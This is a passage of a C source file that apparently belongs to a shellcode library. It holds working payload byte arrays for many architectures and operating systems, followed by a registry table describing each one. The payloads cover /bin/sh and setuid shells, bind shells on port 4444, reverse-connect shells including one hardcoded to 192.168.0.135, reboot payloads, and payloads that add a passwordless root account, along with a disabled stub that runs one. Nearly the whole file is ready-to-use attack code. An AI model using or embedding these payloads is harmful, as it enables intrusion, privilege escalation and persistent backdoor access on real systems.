   "\x7a\xf8\xb2\xd7\x7a\xea\xe6\xc0\x28\xb6\x87\xfc\x4c\x99\xc6\xb8";
*/

unsigned char x86_w32_cmd_exit[] =
"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8"
"\x2a\x6e\x63\x83\xeb\xfc\xe2\xf4\x54\xc2\x2a\x63\xa8\x2a\xe5\x26"
"\x94\xa1\x12\x66\xd0\x2b\x81\xe8\xe7\x32\xe5\x3c\x88\x2b\x85\x2a"
"\x23\x1e\xe5\x62\x46\x1b\xae\xfa\x04\xae\xae\x17\xaf\xeb\xa4\x6e"
"\xa9\xe8\x85\x97\x93\x7e\x4a\x67\xdd\xcf\xe5\x3c\x8c\x2b\x85\x05"
"\x23\x26\x25\xe8\xf7\x36\x6f\x88\x23\x36\xe5\x62\x43\xa3\x32\x47"
"\xac\xe9\x5f\xa3\xcc\xa1\x2e\x53\x2d\xea\x16\x6f\x23\x6a\x62\xe8"
"\xd8\x36\xc3\xe8\xc0\x22\x85\x6a\x23\xaa\xde\x63\xa8\x2a\xe5\x0b"
"\x94\x75\x5f\x95\xc8\x7c\xe7\x9b\x2b\xea\x15\x33\xc0\xc5\xa0\x83"
"\xc8\x42\xf6\x9d\x22\x24\x39\x9c\x4f\x49\x03\x07\x86\x4f\x16\x06"
"\xa8\x2a\x6e\x63";

unsigned char sparc_linux_bind4444[] =
   "\x23\x2d\x57\xbb\xa2\x14\x63\xd5\x20\xbf\xff\xff\x20\xbf\xff\xff"
   "\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20"
   "\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04"
   "\x29\x75\x4f\xd2\xf1\x9a\xaf\xde\x61\x8a\x8f\xdf\x61\x89\x70\x2b"
   "\xb1\xed\x30\x2b\xf1\xd1\xf0\x37\x60\x35\xaf\xcb\x06\x29\x8f\x1d"
   "\x97\x99\xf0\xb1\x3c\x3a\x50\x91\x9a\x2d\xb0\xc1\x32\x6e\x0f\x15"
   "\x54\x4a\xcf\x2d\xb1\xad\x30\x49\x69\xb8\x10\x0d\xc3\xdf\x12\xb8"
   "\xfb\xe4\x2d\x22\x6c\x0b\x72\xa0\x1d\xfb\x52\xb4\xbf\xeb\xb2\xb5"
   "\x22\x28\x0d\x4d\x32\x3f\x52\xa9\xa3\xef\xb2\xa1\x04\x2c\x0d\x39"
   "\x44\x10\xcd\x45\xd4\x47\x12\xb0\x45\xb7\x72\xaa\xb6\x14\xcd\x3e"
   "\xa4\x4b\x12\xbd\x5a\xc9\x32\xc0\xd9\x1d\x92\x98\x4c\xcd\xf3\x0c"
   "\x7c\x52\x0c\xd1\x51\xae\x4c\xdd\xc5\xab\x73\x16\xc4\xc7\xab\xb2"
   "\xa6\xcc\x6a\xac\x85\xe7\xb1\xea\x59\xdb\xea\x1a\xc8\x38\x4a\x12"
   "\x0c\x04\x35\xd2\x1c\x58\xf5\xea\x5c\xbc\xb5\xf6\xde\xd2\xea\x3d"
   "\x4f\x02\xca\x49\x70\xa3\x0a\x49";

unsigned char x86_bsd_suidsh[] =
   "\x31\xc0\x50\x50\xb0\x17\xcd\x80" // setuid
   "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

unsigned char x86_netbsd_binsh[] =
   "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
   "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
   "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
   "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

unsigned char x86_osx_binsh[] = 
	"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
	"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
	"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
	"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
	"\xff/bin/shX";

unsigned char x86_osx_binsh2[] = 
    "\x99\x52\x68\x2f\x2f\x73\x68\x68"
    "\x2f\x62\x69\x6e\x89\xe3\x52\x54"
    "\x54\x53\x53\x8d\x42\x3b\xcd\x80";

unsigned char x86_osx_bind4444[] =
   "\x33\xc9\x83\xe9\xea\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc5"
   "\x7e\x85\xb4\x83\xeb\xfc\xe2\xf4\xaf\x3c\xdd\x79\x45\x14\xe4\xec"
   "\x5c\x2c\xed\xa4\xc7\x6f\xd9\x3d\x24\x2c\xc7\xe6\x87\x2c\xef\xa4"
   "\x08\xfe\x1c\x27\x94\x2d\xd7\xde\xad\x26\x48\x34\x75\x14\x48\x34"
   "\x97\x2d\xd7\x04\xdb\xb3\x05\x23\xaf\x7c\xdc\xde\x9f\x26\xd4\xe3"
   "\x94\xb3\x05\xfd\xca\xf7\x74\x4b\x3a\x81\xd5\xdc\xea\x51\xf6\xdc"
   "\xad\x51\xe7\xdd\xab\xf7\x66\xe4\x91\x2a\xd6\xe7\x75\x45\x48\x34";  

char x86_linux_binsh3[] =
	"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
	"\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
	"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
	"\xd7\xff\xff\xff/bin/sh";

unsigned char x86_solaris_bind4444[] =
   "\x31\xc9\x83\xe9\xe8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
   "\x08\x0b\x8d\x83\xeb\xfc\xe2\xf4\x87\xf7\xf3\x72\x03\xff\xdb\xdd"
   "\x0e\xc8\xbb\x17\x6f\x81\xee\xbc\xf6\x59\x4a\xcc\x6e\x59\xbb\x6b"
   "\xc0\xdd\x3a\x5f\xb6\xcf\x59\xeb\x57\x19\x57\xeb\x6e\x81\xed\xe7"
   "\x2f\x5e\x5c\x3d\xd7\xf7\xde\x3d\xd6\xf7\xde\xdd\x6f\x5f\xbb\x67"
   "\xc0\xdd\x3a\x5f\x8d\x01\x5a\xdf\x6f\xb8\x35\x72\xea\x41\x72\x7f"
   "\x6f\x60\x24\xa2\x4c\x60\x63\xa2\x5d\x61\x65\x04\xdc\x58\x58\x04"
   "\xdd\x58\x59\xde\x8f\x33\xf4\x58";
char arm_linux_binsh[]= "\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5"
   "\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
   "\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char arm_linux_suidsh[]= 
   "\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef"
   "\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5" // shellcode
   "\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"
   "\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef/bin/sh";
char x86_openbsd_binsh[] =
   "\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x54"
   "\x53\x53\x6a\x3b\x58\xcd\x80";
long x86_openbsd_bind6969[]= {
  0x4151c931,0x51514151,0x61b0c031,0x078980cd,0x4f88c931,0x0547c604,0x084f8902,
  0x0647c766,0x106a391b,0x5004478d,0x5050078b,0x68b0c031,0x016a80cd,0x5050078b,
  0x6ab0c031,0xc93180cd,0x078b5151,0xc0315050,0x80cd1eb0,0xc9310789,0x50078b51,
  0xb0c03150,0x4180cd5a,0x7503f983,0x5b23ebef,0xc9311f89,0x89074b88,0x8d51044f,
  0x078b5007,0xc0315050,0x80cd3bb0,0x5151c931,0x01b0c031,0xd8e880cd,0x2fffffff,
  0x2f6e6962,0x90416873 };
unsigned char arm_linux_setuid[]=
   "\x02\x20\x42\xe0\x04\x10\x8f\xe2\x12\x02\xa0\xe1\x01\x20\xc1\xe5\x17\x0b\x90\xef";

unsigned long armle_osx_reverse[]= {
  0xe3a00002, 0xe3a01001, 0xe3a02006, 0xe3a0c061, 0xef000080, 0xe1a0a000, 0xeb000001,
	0x5c110200, //# port 4444
	0x8700a8c0, //# host 192.168.0.135
	0xe1a0000a, 0xe1a0100e, 0xe3a02010, 0xe3a0c062, 0xef000080, 
	0xe3a05002, 0xe3a0c05a, 0xe1a0000a, 0xe1a01005, 0xef000080, 
	0xe2455001, 0xe3550000, 0xaafffff8, 0xe3a00000, 0xe3a01001, 
	0xe3a0c07e, 0xef000080, 0xe0455005, 0xe1a0600d, 0xe24dd020,
	0xe28f0014, 0xe4860000, 0xe5865004, 0xe1a01006, 0xe3a02000, 
	0xe3a0c03b, 0xef000080, 
	//# /bin/sh
	0x6e69622f, 0x0068732f };
unsigned char x64_linux_binsh[] =
   "\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53"
   "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b"
   "\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";
unsigned char x86_freebsd_reboot[] = "\x31\xc0\x50\xb0\x37\xcd\x80";
unsigned char x86_freebsd_reverse[] =
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61"
"\xcd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e"
"\x53\x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53"
"\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d"
"\x7e\x0f\x31\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10"
"\x51\x53\x50\xb0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43"
"\x43\x7f\x00\x00\x01\x2f\x62\x69\x6e\x2f\x73\x68";

unsigned char x86_bsdlinux_binsh[] = // by dymitrii
  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50"
  "\x8c\xe0\x21\xc0\x74\x04\xb0\x3b\xeb\x07\xb0\x0b\x99\x52\x53\x89\xe1\xcd\x80";

char x86_solaris_binsh[] = 
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20"      
"\x43"              
"\xe0\xfa"          
"\x93"              
"\x29\xc0"          
"\x89\x5e\x0b"      
"\x29\xd2"          
"\x88\x56\x19"      
"\x89\x56\x07"      
"\x89\x56\x0f"      
"\x89\x56\x14"      
"\xb0\x3b"          
"\x8d\x4e\x0b"      
"\x89\xca"          
"\x52"              
"\x51"              
"\x53"              
"\x50"              
"\xeb\x18"          
"\xe8\xc8\xff\xff\xff"         
"\x0f\x42\x49\x4e\x0f\x53\x48" 
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
"\x9a\x04\x04\x04\x04\x07\x04";


unsigned char x86_solaris_binshu[] = 
"\xeb\x33\x5e\x8d\x06\x29\xc9\x89\xf3\x89\x5e\x08\xb1\x07\x80\x03\x20\x43\xe0\xfa"
"\x93\x29\xc0\x89\x5e\x0b\x29\xd2\x88\x56\x19\x89\x56\x07\x89\x56\x0f\x89\x56\x14"
"\xb0\x3b\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xc8\xff\xff\xff"
"\x0f\x42\x49\x4e\x0f\x53\x48"            /* /bin/sh -= 0x20          */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

unsigned char ppc_osx_binsh0[] = 
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb\x01\x71\x39\x40\x01\x71"
"\x39\x1f\xfe\xce\x7c\xa8\x29\xae\x38\x7f\xfe\xc7\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xca\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0a\xfe\x90"
"\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x54";

unsigned char ppc_osx_reboot[] =
"\x7c\x63\x1a\x79\x39\x40\x01\x70\x38\x0a\xfe\xb4\x44\xff\xff\x02\x60\x60\x60\x60"
"\x38\x0a\xfe\xc7\x44\xff\xff\x02";

unsigned char ppc_osx_adduser[] =
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70"
"\x39\x60\x01\x70\x39\x1f\xff\x0d\x7c\xa8\x29\xae\x38\x7f\xff\x04"
"\x38\x80\x02\x01\x38\xa0\xff\xff\x38\x0b\xfe\x95\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x9f\xff\x0e\x38\xab\xfe\xe5\x38\x0b\xfe\x94"
"\x44\xff\xff\x02\x60\x60\x60\x60\x38\x0b\xfe\x96\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x38\x7f\xff\x04\x90\x61\xff\xf8"
"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x0b\xfe\xcb\x44\xff\xff\x02"
"\x60\x60\x60\x60\x38\x0b\xfe\x91\x44\xff\xff\x02\x2f\x74\x6d\x70"
"\x2f\x78\x2e\x73\x68\x58\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x27\x72\x30\x30\x74\x3a"
"\x3a\x39\x39\x39\x3a\x38\x30\x3a\x3a\x30\x3a\x30\x3a\x72\x30\x30"
"\x74\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x27\x20\x7c\x20\x2f"
"\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x69\x6c\x6f\x61\x64\x20\x2d"
"\x6d\x20\x70\x61\x73\x73\x77\x64\x20\x2e\x0a";

long ppc_bsd_binsh[] = { /* Palante's BSD PPC shellcode w/ NULL*/
  0x7CC63278, 0x2F867FFF, 0x41BC005C, 0x7C6802A6,
  0xB0C3FFF9, 0xB0C3FFF1, 0x38867FF0, 0x38A67FF4,
  0x38E67FF3, 0x7CA52278, 0x7CE72278, 0x7C853A14,
  0x7CC419AE, 0x7C8429D6, 0x7C842214, 0x7C043A14,
  0x7CE72850, 0x7C852A14, 0x7C63212E, 0x7C832214,
  0x7CC5212E, 0x7CA52A78, 0x44FFFF02, 0x7CE03B78,
  0x44FFFF02, 0x4BFFFFA9, 0x2F62696E, 0x2F73685A,
  0xFFFFFFFF, 0xFFFFFFFF
};

/*
 * 203 byte StrongARM/Linux bind() portshell shellcode
 * funkysh
 */

char arm_linux_bind[] =
	"\x20\x60\x8f\xe2"   /*  add   r6, pc, #32           */
	"\x07\x70\x47\xe0"   /*  sub   r7, r7, r7            */
	"\x01\x70\xc6\xe5"   /*  strb  r7, [r6, #1]          */
	"\x01\x30\x87\xe2"   /*  add   r3, r7, #1            */
	"\x13\x07\xa0\xe1"   /*  mov   r0, r3, lsl r7        */
	"\x01\x20\x83\xe2"   /*  add   r2, r3, #1            */
	"\x07\x40\xa0\xe1"   /*  mov   r4, r7                */
	"\x0e\xe0\x4e\xe0"   /*  sub   lr, lr, lr            */
	"\x1c\x40\x2d\xe9"   /*  stmfd sp!, {r2-r4, lr}      */
	"\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */
	"\x66\xff\x90\xef"   /*  swi   0x90ff66     (socket) */
	"\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */
	"\x35\x70\xc6\xe5"   /*  strb  r7, [r6, #53]         */
	"\x14\x20\xa0\xe3"   /*  mov   r2, #20               */
	"\x82\x28\xa9\xe1"   /*  mov   r2, r2, lsl #17       */
	"\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */
	"\x14\x40\x2d\xe9"   /*  stmfd sp!, {r2,r4, lr}      */
	"\x10\x30\xa0\xe3"   /*  mov   r3, #16               */
	"\x0d\x20\xa0\xe1"   /*  mov   r2, sp                */
	"\x0d\x40\x2d\xe9"   /*  stmfd sp!, {r0, r2, r3, lr} */
	"\x02\x20\xa0\xe3"   /*  mov   r2, #2                */
	"\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
	"\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */
	"\x66\xff\x90\xef"   /*  swi   0x90ff66       (bind) */
	"\x45\x70\xc6\xe5"   /*  strb  r7, [r6, #69]         */
	"\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */
	"\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
	"\x66\xff\x90\xef"   /*  swi   0x90ff66     (listen) */
	"\x5d\x70\xc6\xe5"   /*  strb  r7, [r6, #93]         */
	"\x01\x20\x82\xe2"   /*  add   r2, r2, #1            */
	"\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */
	"\x04\x70\x8d\xe5"   /*  str   r7, [sp, #4]          */
	"\x08\x70\x8d\xe5"   /*  str	 r7, [sp, #8]          */
	"\x66\xff\x90\xef"   /*  swi   0x90ff66     (accept) */
	"\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */
	"\x02\x10\xa0\xe3"   /*  mov   r1, #2                */
	"\x71\x70\xc6\xe5"   /*  strb  r7, [r6, #113]        */
	"\x15\x07\xa0\xe1"   /*  mov   r0, r5, lsl r7 <dup2> */
	"\x3f\xff\x90\xef"   /*  swi   0x90ff3f       (dup2) */
	"\x01\x10\x51\xe2"   /*  subs  r1, r1, #1            */
	"\xfb\xff\xff\x5a"   /*  bpl   <dup2>                */
	"\x99\x70\xc6\xe5"   /*  strb  r7, [r6, #153]        */
	"\x14\x30\x8f\xe2"   /*  add   r3, pc, #20           */
	"\x04\x30\x8d\xe5"   /*  str	 r3, [sp, #4]          */
	"\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */
	"\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */
	"\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */
	"\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */
	"\x0b\xff\x90\xef"   /*  swi	 0x900ff0b    (execve) */
	"/bin/sh";

char x86_ppc_linux_binsh[] =
//
// These four bytes work out to the following instruction
// in ppc arch: "rlwnm   r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
//
// However on x86 architecture the four bytes are 3
// instructions:
//
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"

"\x69\x69\x69\x69"	/*nop*/
"\x69\x69\x69\x69"	/*nop*/
"\x69\x69\x69\x69"	/*nop*/
// linux/ppc execve /bin/sh by Charles Stevenson (core) <core@bokeoa.com>
"\x7c\x3f\x0b\x78"	/*mr	r31,r1 # optional instruction */
"\x7c\xa5\x2a\x79"	/*xor.	r5,r5,r5*/
"\x42\x40\xff\xf9"	/*bdzl+	10000454<main>*/
"\x7f\x08\x02\xa6"	/*mflr	r24*/
"\x3b\x18\x01\x34"	/*addi	r24,r24,308*/
"\x98\xb8\xfe\xfb"	/*stb	r5,-261(r24)*/
"\x38\x78\xfe\xf4"	/*addi	r3,r24,-268*/
"\x90\x61\xff\xf8"	/*stw	r3,-8(r1)*/
"\x38\x81\xff\xf8"	/*addi	r4,r1,-8*/
"\x90\xa1\xff\xfc"	/*stw	r5,-4(r1)*/
"\x3b\xc0\x01\x60"	/*li	r30,352*/
"\x7f\xc0\x2e\x70"	/*srawi	r0,r30,5*/
"\x44\xde\xad\xf2"	/*.long	0x44deadf2*/
"/bin/shZ" // the last byte becomes NULL

// lnx_binsh4.c - v1 - 23 Byte /bin/sh sysenter Opcode Array Payload
// Copyright(c) 2005 c0ntex <c0ntex@open-security.org>
// Copyright(c) 2005 BaCkSpAcE <sinisa86@gmail.com>
"\x6a\x0b\x58\x99\x52\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x54"
"\x5b\x52\x53\x54\x59\x0f\x34";

char x86_ppc_osx_binsh[] = 
//
// These four bytes work out to the following instruction 
// in ppc arch: "rlwnm   r16,r28,r29,13,4", which will
// basically do nothing on osx/ppc.
// 
// However on x86 architecture the four bytes are 3 
// instructions:
// 
// "push/nop/jmp"
//
// In this way, execution will be taken to the x86 shellcode
// on an x86 machine, and the ppc shellcode when running
// on a ppc architecture machine.
//
"\x5f\x90\xeb\x48"

// ppc execve() code by b-r00t
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd"
"\x7d\x68\x02\xa6\x3b\xeb\x01\x70"
"\x39\x40\x01\x70\x39\x1f\xfe\xcf"
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb"
"\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x38\x0a\xfe\x91\x44\xff\xff\x02"
"\x2f\x62\x69\x6e\x2f\x73\x68\x58"

// osx86 execve() code by nemo
"\x31\xdb\x6a\x3b\x58\x53\xeb\x18\x5f"
"\x57\x53\x54\x54\x57\x6a\xff\x88\x5f"
"\x07\x89\x5f\xf5\x88\x5f\xfa\x9a\xff"
"\xff\xff\xff\x2b\xff\xe8\xe3\xff\xff"
"\xff/bin/shX";



#define ENTRY(a,b,c,x,y,z) { .name=x, .desc=z, .data=(unsigned char *)&y, .len=sizeof(y)-1, \
	.cmd=a, .host=b, .port=c },
#define ENTRY_NULL() { NULL, NULL, NULL, 0 }

struct shellcode_t shellcodes[] = {
 ENTRY(0,0,0,"arm.linux.binsh",       arm_linux_binsh,          "Runs /bin/sh" )
 ENTRY(0,0,0,"arm.linux.suidsh",      arm_linux_suidsh,         "Setuid and runs /bin/sh" )
 ENTRY(0,0,0,"arm.linux.bind",        arm_linux_bind,           "Binds /bin/sh to a tcp port" )
 ENTRY(0,0,30,"armle.osx.reverse",    armle_osx_reverse,        "iPhone reverse connect shell to HOST and PORT" )
 ENTRY(0,0,0,"dual.linux.binsh",      x86_ppc_linux_binsh,      "x86/ppc MacOSX /bin/sh shellcode" )
 ENTRY(0,0,0,"dual.osx.binsh",        x86_ppc_osx_binsh,        "Runs /bin/sh (works also on x86) (dual)" )
 ENTRY(0,0,0,"mips.linux.binsh",      mips_linux_binsh,         "Runs /bin/sh (tested on loongson2f)." )
 ENTRY(0,0,0,"ppc.osx.adduser",       ppc_osx_adduser,          "Adds a root user named 'r00t' with no pass." )
 ENTRY(0,0,0,"ppc.osx.binsh",         ppc_osx_binsh,            "Executes /bin/sh" )
 ENTRY(0,0,0,"ppc.osx.binsh0",        ppc_osx_binsh0,           "Executes /bin/sh (with zeroes)" )
 ENTRY(0,0,0,"ppc.osx.bind4444",      ppc_osx_bind4444,         "Binds a shell at port 4444" )
 ENTRY(0,0,0,"ppc.osx.reboot",        ppc_osx_reboot,           "Reboots the box" )
 ENTRY(0,0,0,"ppc.bsd.binsh",         ppc_bsd_binsh,            "Runs /bin/sh" )
 ENTRY(0,0,0,"sparc.linux.binsh",  sparc_linux_binsh,     "Runs /bin/sh on sparc/linux" )
 ENTRY(0,0,0,"sparc.linux.bind4444",  sparc_linux_bind4444,     "Binds a shell at TCP port 4444" )
 ENTRY(0,0,0,"sparc.linux.binsh2",  sparc_linux_javicoder_binsh,     "Runs /bin/sh on sparc/linux (coder)" )
 ENTRY(0,0,0,"sparc.linux.bind1124",  sparc_linux_javicoder_portbind,     "Listen shell at 1124" )
 ENTRY(0,0,0,"sparc.linux.connect",  sparc_linux_javicoder_connect,     "Connects to 10.12.34.3 : 1124")
 //ENTRY(0,0,0,"ia64.linux.binsh",      ia64_linux_binsh,         "Executes /bin/sh on Intel Itanium" )
 ENTRY(0,0,0,"x64.linux.binsh",       x64_linux_binsh,          "Runs /bin/sh on 64 bits" )
 ENTRY(0,0,0,"x86.bsd.binsh",         x86_bsd_binsh,            "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.bsd.binsh2",        x86_bsd_binsh2,           "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.bsd.suidsh",        x86_bsd_suidsh,           "Setuid(0) and runs /bin/sh" )
 ENTRY(0,0,0,"x86.bsd.bind4444",      x86_bsd_bind4444,         "Binds a shell at port 4444" )
 ENTRY(0,0,0,"x86.bsdlinux.binsh",    x86_bsdlinux_binsh,       "Dual linux/bsd shellcode runs /bin/sh" )
 ENTRY(0,0,0,"x86.freebsd.reboot",    x86_freebsd_reboot,       "Reboots target box" )
 ENTRY(0,0,0,"x86.freebsd.reverse",   x86_freebsd_reverse,      "Reboots target box" )
 ENTRY(0,0,0,"x86.linux.adduser",     x86_linux_adduser,        "Adds user 'x' with password 'y'" )
 ENTRY(0,0,0,"x86.linux.bind4444",    x86_linux_bind4444,       "Binds a shell at TCP port 4444" )
 ENTRY(0,0,0,"x86.linux.binsh",       x86_linux_binsh,          "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.linux.binsh1",      x86_linux_binsh1,          "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.linux.binsh2",      x86_linux_binsh2,         "Executes /bin/sh" )
 ENTRY(43,0,0,"x86.linux.binsh3",     x86_linux_binsh3,         "Executes /bin/sh or CMD" )
 ENTRY(0,0,0,"x86.linux.udp4444",     x86_linux_udp4444,        "Binds a shell at UDP port 4444" )
 ENTRY(0,0,0,"x86.netbsd.binsh",      x86_netbsd_binsh,         "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.openbsd.binsh",     x86_openbsd_binsh,        "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.openbsd.bind6969",  x86_openbsd_bind6969,     "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.osx.binsh",         x86_osx_binsh,            "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.osx.binsh2",        x86_osx_binsh2,            "Executes /bin/sh" )
 ENTRY(0,0,0,"x86.osx.bind4444",      x86_osx_bind4444,         "Binds a shell at port 4444" )
 ENTRY(0,0,0,"x86.solaris.binsh",     x86_solaris_binsh,        "Runs /bin/sh" )
 ENTRY(0,0,0,"x86.solaris.binshu",    x86_solaris_binshu,       "Runs /bin/sh (toupper() safe)" )
 ENTRY(0,0,0,"x86.solaris.bind4444",  x86_solaris_bind4444,     "Binds a shell at port 4444" )
 ENTRY(0,0,0,"x86.w32.msg",           x86_w32_msg,              "Shows a MessageBox" )
 ENTRY(0,0,0,"x86.w32.cmd",           x86_w32_cmd_exit,         "Runs cmd.exe and ExitThread" )
 ENTRY(0,0,0,"x86.w32.adduser",       x86_w32_adduser,          "Adds user 'x' with password 'y'" )
 ENTRY(0,0,0,"x86.w32.bind4444",      x86_w32_bind4444,         "Binds a shell at port 4444" )
 ENTRY(0,0,0,"x86.w32.tcp4444",       x86_w32_tcp4444,          "Binds a shell at port 4444" )
 ENTRY_NULL()
};

#if 0
  main()
  {
    void (*punk)() = &x86_linux_binsh;

    punk();

    printf("%s\n", shellcodes[0].desc);
  }
#endif
